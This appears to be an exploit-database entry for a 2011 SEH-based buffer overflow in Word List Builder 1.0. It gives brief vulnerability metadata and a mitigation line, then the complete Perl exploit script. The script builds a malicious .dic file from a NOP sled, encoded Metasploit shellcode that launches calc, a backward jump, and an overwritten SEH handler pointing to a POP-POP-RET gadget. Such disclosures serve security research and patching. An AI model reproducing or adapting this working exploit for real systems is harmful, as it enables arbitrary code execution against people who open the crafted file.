Word List Builder Buffer Overflow Exploit(SEH)

vendor:

Word List Builder

by:

h1ch4m (Hicham Oumounid)

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Word List Builder

Affected Version From: 1

Affected Version To: 1

Patch Exists: YES

Related CWE: N/A

CPE: a:word_list_builder:word_list_builder:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win XP SP3 French

2011

Word List Builder Buffer Overflow Exploit(SEH)

A buffer overflow vulnerability exists in Word List Builder 1.0 when a specially crafted .dic file is opened, which could allow an attacker to execute arbitrary code. The vulnerability is due to insufficient boundary checks when processing the .dic file. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application.

Mitigation:

Update to the latest version of Word List Builder.

Source

Exploit-DB raw data:

# Exploit Title: Word List Builder Buffer Overflow Exploit(SEH)
# Software Link: http://download.cnet.com/Word-List-Builder/3000-18541_4-10398336.html
# Version: 1.0
# triggering details : open .dic file
# Tested on: Win XP SP3 French
# Date: 31/03/2011
# Author: h1ch4m (Hicham Oumounid)
# Email: h1ch4m@live.fr
# Home: http://net-effects.blogspot.com

my $file = "exploit.dic";

my $size = 4108;

# windows/exec - 223 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
my $shellcode = "\xda\xdd\xbf\xb0\x1a\x64\x4f\xd9\x74\x24\xf4\x58\x31\xc9" .
                "\xb1\x32\x31\x78\x17\x83\xc0\x04\x03\xc8\x09\x86\xba\xd4" .
                "\xc6\xcf\x45\x24\x17\xb0\xcc\xc1\x26\xe2\xab\x82\x1b\x32" .
                "\xbf\xc6\x97\xb9\xed\xf2\x2c\xcf\x39\xf5\x85\x7a\x1c\x38" .
                "\x15\x4b\xa0\x96\xd5\xcd\x5c\xe4\x09\x2e\x5c\x27\x5c\x2f" .
                "\x99\x55\xaf\x7d\x72\x12\x02\x92\xf7\x66\x9f\x93\xd7\xed" .
                "\x9f\xeb\x52\x31\x6b\x46\x5c\x61\xc4\xdd\x16\x99\x6e\xb9" .
                "\x86\x98\xa3\xd9\xfb\xd3\xc8\x2a\x8f\xe2\x18\x63\x70\xd5" .
                "\x64\x28\x4f\xda\x68\x30\x97\xdc\x92\x47\xe3\x1f\x2e\x50" .
                "\x30\x62\xf4\xd5\xa5\xc4\x7f\x4d\x0e\xf5\xac\x08\xc5\xf9" .
                "\x19\x5e\x81\x1d\x9f\xb3\xb9\x19\x14\x32\x6e\xa8\x6e\x11" .
                "\xaa\xf1\x35\x38\xeb\x5f\x9b\x45\xeb\x07\x44\xe0\x67\xa5" .
                "\x91\x92\x25\xa3\x64\x16\x50\x8a\x67\x28\x5b\xbc\x0f\x19" .
                "\xd0\x53\x57\xa6\x33\x10\xa9\x57\x8e\x8c\x3e\xce\x7b\xed" .
                "\x22\xf1\x51\x31\x5b\x72\x50\xc9\x98\x6a\x11\xcc\xe5\x2c" .
                "\xc9\xbc\x76\xd9\xed\x13\x76\xc8\x8d\xf2\xe4\x90\x51";

my $jump = "\xe9\x1c\xff\xff\xff"; # jump back 228 bytes 

my $nseh = "\xeb\xf9\xff\xff";     # jump back 7 bytes 
my $seh = pack('V', 0x00402AAF);   # pop eax - pop edx - ret [word_builder.exe]

my $junk = "\x90" x ($size-length($shellcode.$jump));

open($FILE,">$file");
print $FILE $junk.$shellcode.$jump.$nseh.$seh;
close($FILE);
print "Files Created successfully\n";
sleep(1);